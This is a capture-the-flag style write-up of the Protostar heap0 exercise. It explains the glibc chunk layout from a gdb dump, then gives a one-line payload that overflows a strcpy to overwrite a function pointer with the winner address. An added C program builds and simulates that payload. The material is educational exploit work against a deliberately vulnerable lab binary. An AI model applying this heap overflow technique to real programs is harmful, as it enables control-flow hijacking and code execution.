In this exercise we overwrite heap memory to redirect the program's control flow.

Let us set a breakpoint after each malloc call and examine the addresses it returns. The first malloc returns 0x804a008, the second returns 0x804a050.

(gdb) x/22x 0x804a000
0x804a000:	0x00000000	0x00000049	0x00000000	0x00000000
0x804a010:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a020:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a030:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a040:	0x00000000	0x00000000	0x00000000	0x00000011
0x804a050:	0x00000000

Each allocation is preceded by an 8-byte chunk header (32-bit glibc malloc: a 4-byte prev_size field followed by a 4-byte size field). The size field holds the size of the whole chunk, header included, and its lowest bit is the PREV_INUSE flag, so 0x49 means a 0x48-byte (72-byte) chunk: 64 bytes of user data plus the 8-byte header. In a more readable form:

header of first malloc:
0x804a000:	0x00000000	0x00000049

allocated space of the first malloc:
0x804a008:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a018:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a028:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a038:	0x00000000	0x00000000	0x00000000	0x00000000	

header of second malloc (0x11 = 0x10 | PREV_INUSE, the 16-byte minimum chunk):
0x804a048:	0x00000000	0x00000011

allocated space of the second malloc:
0x804a050:	0x00000000

The second malloc holds a function pointer, which the program calls at the end. The goal of this exercise is to overwrite that pointer with the address of the winner function (0x08048464).

The strcpy before the final call copies the command-line argument into the space allocated by the first malloc with no length check, so anything longer than 64 bytes runs past the end of data->name into the next chunk. The payload is therefore 64 bytes (size of data->name) plus 8 bytes (header of the second chunk) of filler, followed by the address of winner in little-endian byte order. The filler also clobbers the second chunk's size field with 0x41414141; that only matters if the chunk is later passed to free, which does not happen before the pointer is called. The solution (Python 2 print syntax, as on the Protostar VM):

/opt/protostar/bin/heap0 `python -c 'print "A"*72 + "\x64\x84\x04\x08"'`
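As an added example (not code from the original write-up or from Protostar), the following C program builds the payload from the two addresses the program prints and replays it against a constructed byte image of the heap laid out exactly as in the gdb dump above. It generalises the 64 + 8 = 72 calculation: the filler length is simply the distance between the two returned addresses, whatever the allocator's header size. The heap image, the offsets and the addresses are taken from the dump and the text on this page; the functions build_payload, simulate_heap0 and hijacked_fp are names chosen here.

```c
/* Added example, not code from the original write-up or from Protostar. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets inside the constructed heap image, relative to 0x804a000. */
#define CHUNK1_HDR     0x00  /* prev_size, then size = 0x49 (0x48 | PREV_INUSE) */
#define CHUNK1_DATA    0x08  /* data->name: 64 bytes, the strcpy destination */
#define CHUNK2_HDR     0x48  /* prev_size, then size = 0x11 (0x10 | PREV_INUSE) */
#define CHUNK2_DATA    0x50  /* f->fp: the 4-byte function pointer */
#define HEAP_IMAGE_LEN 0x60

struct heap0_result {
    uint32_t fp;          /* value of f->fp after the copy */
    uint32_t chunk2_size; /* size field of the second chunk after the copy */
};

static void write_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fill from the start of data->name up to f->fp, then append the target
 * address little-endian. The padding is fp_addr - data_addr (72 on the
 * page), which covers the second chunk's header automatically. Returns the
 * payload length, or 0 if the addresses are misordered or out is too small. */
size_t build_payload(uint8_t *out, size_t cap,
                     uint32_t data_addr, uint32_t fp_addr, uint32_t target)
{
    if (fp_addr <= data_addr)
        return 0;
    size_t pad = fp_addr - data_addr;
    if (pad + 4 > cap)
        return 0;
    memset(out, 'A', pad);
    write_le32(out + pad, target);
    return pad + 4;
}

/* Replay strcpy(d->name, payload) against the heap image. Like the real
 * strcpy it stops at the first NUL and writes a terminating NUL; the image
 * bound only keeps the simulation itself memory-safe. f->fp starts as 0,
 * as in the dump (taken before the program assigns it). */
struct heap0_result simulate_heap0(const uint8_t *payload, size_t len)
{
    uint8_t heap[HEAP_IMAGE_LEN] = {0};
    struct heap0_result r;
    size_t i;

    write_le32(heap + CHUNK1_HDR + 4, 0x49);
    write_le32(heap + CHUNK2_HDR + 4, 0x11);

    for (i = 0; i < len && payload[i] != '\0' && CHUNK1_DATA + i < HEAP_IMAGE_LEN; i++)
        heap[CHUNK1_DATA + i] = payload[i];
    if (CHUNK1_DATA + i < HEAP_IMAGE_LEN)
        heap[CHUNK1_DATA + i] = '\0';

    r.fp = read_le32(heap + CHUNK2_DATA);
    r.chunk2_size = read_le32(heap + CHUNK2_HDR + 4);
    return r;
}

/* Build the payload for the given addresses, replay it and return the
 * pointer value the program would end up calling (0 on a bad payload). */
uint32_t hijacked_fp(uint32_t data_addr, uint32_t fp_addr, uint32_t target)
{
    uint8_t payload[256];
    size_t n = build_payload(payload, sizeof payload, data_addr, fp_addr, target);
    if (n == 0)
        return 0;
    return simulate_heap0(payload, n).fp;
}

/* Print the payload as the \x escapes used in the python -c one-liner. */
int main(void)
{
    uint8_t payload[256];
    size_t n = build_payload(payload, sizeof payload,
                             0x0804a008u, 0x0804a050u, 0x08048464u);
    struct heap0_result r = simulate_heap0(payload, n);
    size_t i;

    printf("payload (%zu bytes): ", n);
    for (i = 0; i < n; i++)
        printf("\\x%02x", payload[i]);
    printf("\nf->fp after strcpy: 0x%08x\n", r.fp);
    printf("chunk 2 size after strcpy: 0x%08x (clobbered; harmless unless freed)\n",
           r.chunk2_size);
    return 0;
}
```

The simulation makes the side effect visible: the same copy that plants 0x08048464 in f->fp also leaves 0x41414141 in the second chunk's size field, which is why this payload is only safe in a program that calls the pointer without freeing the chunk first.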
